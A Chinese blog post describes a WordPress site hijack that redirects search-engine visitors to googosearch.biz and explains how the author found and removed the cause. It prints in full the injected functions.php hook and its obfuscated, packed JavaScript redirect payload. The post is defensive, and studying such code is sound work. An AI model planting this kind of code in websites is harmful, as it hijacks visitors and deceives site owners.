网站跳转到googosearch.biz

网站跳转到googosearch.biz

2012-03-05 / 分类：网络心得 / 8 条评论 / 1,120 次阅读
偶然发现从google搜索指南者博客的另一个域名，打开后博客会被自动跳转到http://googosearch.biz/search.php...这样的搜索请求页面，然后重定向到不同的网站，显然这是被黑客恶意利用了。

网站被黑客篡改，通常为两种方式：

一，网站服务器有安全漏洞，被黑客侵入并篡改；

二，博客安装了来源不明的插件或主题（尤其是网上分享的一些免费破解版本）。

经查询 googosearch.biz 该网站是个国外的并不怎么知名的搜索引擎，经常用一些歪门邪道的方式获取流量。

想了想我的博客并没有什么有价值的东西值得黑客入侵，并且我使用的服务器是大型网络公司的安全性一向很好，只能从博客自身源码中找猫腻了，花了一下午的时间，终于功夫不负有心人，找到了问题所在，黑客使用了JavaScript检测并判断访问来源方式，然后将符合条件的重定向到http://googosearch.biz/search.php...

黑客在我的博客主题函数文件 functions.php 中植入了如下代码，是加密过的：

add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r)
{e=function
(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from
CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while
(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.rep
lace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e
r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\
";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\
")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\
"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w
\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5
\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o
(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referre
r|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substri
ng|split||||||ea|ht|tp|document|||go|window|location'.split('|'),
0,{}))</script>"; } } }

如果您也遇到类似问题，先备份原文件然后删除以上恶意代码即可。黑客通常会使用一些恶意的JavaScript插入到网页的PHP代码中，一般会在页脚前，wordpress程序中的恶意代码通常在 WP-load.php、wp-config.php程序配置文件、主题文件中的 functions.php 模板函数文件，以及/wp-content/plugins/下的插件源码中被发现，因值得注意，并且不要给予写入的权限。

© 原文地址: http://www.amznz.com/redirects-to-googosearch-biz/
版权所有！如转载文章，请务必注明以上引用地址,否则请勿转载!
相关文章
More Articles About: functions,google,googosearch.biz,javascript,wordpress,跳转,重定向

☺ 邮件订阅指南者最新文章

♥ 您想建一个跟指南者类似的独立博客吗？
✓ 逛累了就来指南者的小卖铺看看珍藏吧！

◑简→繁转换

转换到繁体中文

有趣的东西#

♥ 在这里宣传你的产品?看这里»

公告栏

博客语:忧伤的灵，使骨枯干。
耶稣到底要我们放弃生命中的什么东西?

随机文章

固定链接设置-WP博客: Wordpress博客固定链接设......
TI AMERO` 我依然爱你: 分享一......
爱情短片《天空之城》校友作品: 偶尔看到了这样一段视频短片，是一......
18家知名国外广告联盟: 下面是18家知名的国外广告联盟网......
Linux硬盘读写测试: Linux服务器想要知道硬盘的读写是否能满足服务的需要，我们可以使用Linux自......
曾轶可《最天使》歌词 & MP3: 曾轶可《最天使》原创歌词…… 最好的那个天使我最熟悉的字是你的名字我们会有大......
穷得只剩下钱: 《穷得只剩下钱》这本书不知道你有......
LOVE LAND 世界最大“性爱”主题公园: 偶尔看到了“LOVE LAND”......
SimplePie简介: SimplePie是一个非常简单、实用的Syndication数据处理工具包。使......
【最新】Godaddy 1美金域名优惠码 7月15日截止: 分享一下最新最给力的Godadd......
LAMP和LNMP区别是什么？: LAMP和LNMP都是在网站服务......
北京办理租房发票方法: 之前发文分享了在北京如何办理暂住证，这里再说一下在北京如何自行办理租房发票，特此......
IP和Socket小知识: 不是仅仅只有网络工程师才接触网络......
2009，厚积薄发的财经类网站[转]: 经济危机的肆虐并没有减缓中国经......
神秘现象不神秘 txt下载: 推荐一本科普书，名为《神秘现象不神秘》，该书为科普作家方舟子所著，提供TXT格式......
此情至深-相思树: 刚看了一篇故事很动人战国末年宋国韩凭娶妻何氏何氏很美宋康王强夺何氏韩凭则沦......
将jar格式电子书转换txt格式: 1. 用winrar解压jar到某个文件夹2. 删掉.class文件3. 用记事......
慎终追远 09.4.29: 敢问世界上最痛苦的失去是什么？第一次经历此般彻底的悲痛这突如其来的终极打击我........
不经心的温柔，有时真危险[转]: 当你开始质疑友谊的真实度时，有些事情就变的不太一样了，理智和情感出现强烈拉扯。......
滥情解千愁，寂寞把烟抽: 我很累，感觉到寂寞、会不停的想到你，然后怀疑你，明显是应为生活少了你令我不适应这......

网站跳转到googosearch.biz

◑简→繁转换

有趣的东西#

公告栏

热门阅读

推荐

随机文章

最新评论

网站跳转到googosearch.biz

相关文章

◑简→繁转换

有趣的东西#

公告栏

热门阅读

推荐

随机文章

最新评论